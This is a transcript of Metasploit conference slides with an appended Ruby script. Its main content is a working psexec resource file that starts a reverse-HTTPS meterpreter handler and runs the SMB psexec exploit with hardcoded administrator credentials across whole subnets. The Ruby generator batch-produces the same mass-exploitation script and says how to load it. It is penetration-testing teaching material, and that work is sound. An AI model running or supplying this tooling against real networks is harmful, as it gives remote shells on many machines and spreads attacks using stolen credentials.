Metasploit Magic: the dark corners of the framework

Post on 08-May-2015


Metasploit Magic: A little sleight of hand

But first...

Installing Metasploit

svn co https://metasploit.com/svn/trunk msf

(the svn repository is historical; the framework has since moved to git at https://github.com/rapid7/metasploit-framework)

not... here

ESPECIALLY not here

it is a SYN

SRSLY!

here is ok ;-)

and remember...

this isn’t the only place you can install it...

Directory Structure (the msf3 checkout)

HACKING, README, documentation: developer notes and user docs
armitage: the Armitage GUI front-end
data, external, lib, modules, plugins, scripts, tools, bins: framework data, bundled third-party code, the core library, the modules tree, console plugins, meterpreter scripts and helper tools
msfconsole: the interactive console
msfgui: the GUI
msfcli: one-shot command-line interface
msfd: daemon that exposes the console over a socket
msfrpc, msfrpcd: RPC client and daemon
msfpayload, msfencode: payload generation and encoding
msfelfscan, msfmachscan, msfpescan: return-address / opcode scanners for ELF, Mach-O and PE binaries
msfopcode: client for the opcode database
msfupdate: updater
psexec.rc: the resource script used later in this deck

~/.msf3/ (the per-user directory; Metasploit 4 moved it to ~/.msf4/)

• history, logs, loot

• msfconsole.rc: runs every time msfconsole starts, so it holds YOUR SETTINGS

• modules: YOUR MODULES, loaded alongside the framework's own tree

resource files

• a line-by-line script of console commands

• can embed ruby (between <ruby> and </ruby> tags)

• work for meterpreter sessions now too!

./msfconsole -r psexec.rc

msf> resource psexec.rc

psexec scanner (psexec.rc)

# one handler for every session, kept alive with ExitOnSession false
use multi/handler
setg PAYLOAD windows/meterpreter/reverse_https
setg LHOST 192.168.1.100
setg LPORT 443
set ExitOnSession false
exploit -j -z

# the exploit reuses the global payload settings; DisablePayloadHandler
# stops each run from trying to bind its own listener on 443
use windows/smb/psexec
set SMBUser AdminBob
set SMBPass ThisPasswordSucks
set SMBDomain .
set DisablePayloadHandler true

<ruby>
require 'rex/socket/range_walker'
rhosts = '10.10.10.0/24,10.10.14.0/24'
iplist = Rex::Socket::RangeWalker.new(rhosts)
# inside a <ruby> block, self is the console driver, so run_single
# executes a console command exactly as if it were typed
iplist.each do |rhost|
  self.run_single("set RHOST #{rhost}")
  self.run_single("exploit -j -z")   # one backgrounded job per host
end
</ruby>

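The same scanner can be pre-generated as a plain resource file rather than built at run time with a <ruby> block. The script below is an added example, not code from the slides or from the framework: it expands target ranges with Ruby's stdlib IPAddr (standing in for Rex::Socket::RangeWalker, so it runs without Metasploit installed), emits the handler and psexec commands shown above, and inserts a `sleep` line after every batch of hosts so that a /24 does not launch 254 backgrounded jobs in the same instant. The function names, the batch size and the sample ranges are assumptions of this example.

```ruby
#!/usr/bin/env ruby
# Added example (not from the slides): pre-generate a psexec "scanner"
# resource file. IPAddr-based range expansion stands in for
# Rex::Socket::RangeWalker so this runs without Metasploit.
require 'ipaddr'
require 'socket'

# Expand "10.0.0.0/30,10.0.1.5,10.0.2.1-10.0.2.3" into a deduplicated list
# of dotted-quad strings, in the order given. Mimics RangeWalker's input
# format for IPv4 CIDR, single hosts and full dash ranges (both sides of a
# dash must be complete addresses; the "1-3" shorthand is not handled).
def expand_targets(spec)
  spec.split(',').map(&:strip).reject(&:empty?).flat_map do |item|
    if item.include?('-')
      first, last = item.split('-', 2).map { |s| IPAddr.new(s.strip) }
      raise ArgumentError, "bad range #{item}" if last.to_i < first.to_i
      (first.to_i..last.to_i).map { |n| IPAddr.new(n, Socket::AF_INET).to_s }
    else
      IPAddr.new(item).to_range.map(&:to_s) # CIDR or single host
    end
  end.uniq
end

# Build the resource script text. After every `batch` hosts a `sleep`
# command is emitted (msfconsole's `sleep N` pauses the script for N
# seconds) so that hundreds of `exploit -j -z` jobs are not started at once.
def psexec_resource(targets, lhost:, lport: 443, user:, pass:, domain: '.',
                    batch: 16, pause: 5)
  hosts = expand_targets(targets)
  lines = [
    'use multi/handler',
    'setg PAYLOAD windows/meterpreter/reverse_https',
    "setg LHOST #{lhost}",
    "setg LPORT #{lport}",
    'set ExitOnSession false',
    'exploit -j -z',
    'use windows/smb/psexec',
    "set SMBUser #{user}",
    "set SMBPass #{pass}",
    "set SMBDomain #{domain}",
    'set DisablePayloadHandler true'
  ]
  hosts.each_with_index do |rhost, i|
    lines << "set RHOST #{rhost}"
    lines << 'exploit -j -z'
    done = i + 1
    lines << "sleep #{pause}" if done % batch == 0 && done < hosts.length
  end
  lines.join("\n") + "\n"
end

if $PROGRAM_NAME == __FILE__
  # Constructed sample input: two tiny ranges plus an overlapping single host.
  puts psexec_resource('10.10.10.0/30,10.10.14.1-10.10.14.2,10.10.10.1',
                       lhost: '192.168.1.100',
                       user: 'AdminBob', pass: 'ThisPasswordSucks')
end
```

Redirect the output to a file and load it with `./msfconsole -r file.rc` or `msf> resource file.rc`; because the handler is started first with ExitOnSession false, every callback lands in the same listener regardless of how many hosts the script touches.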

magic

• use .*psexec

other fun...

• script (record the whole terminal session to a file)

• color false (turn off ANSI colour so the recorded output stays readable)

• screen (keep the console and its sessions alive in a detachable terminal)

meterpreter> guid

• twitter.com/mubix

• mubix[hak5.org]
